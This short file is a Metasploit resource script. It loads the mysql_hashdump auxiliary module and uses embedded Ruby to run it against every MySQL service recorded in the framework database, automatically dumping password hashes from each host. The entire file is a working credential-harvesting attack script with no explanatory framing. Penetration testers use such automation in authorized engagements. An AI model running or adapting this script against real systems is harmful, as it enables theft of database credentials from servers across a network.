use auxiliary/scanner/mysql/mysql_hashdump

<ruby>
framework.db.hosts.each do |host|
  host.services.each do |service|
    if service.name == "mysql"
      self.run_single("set RHOSTS #{host.address}")
      self.run_single("set RPORT #{service.port}")
      self.run_single("run")
    end
  end
end
</ruby>
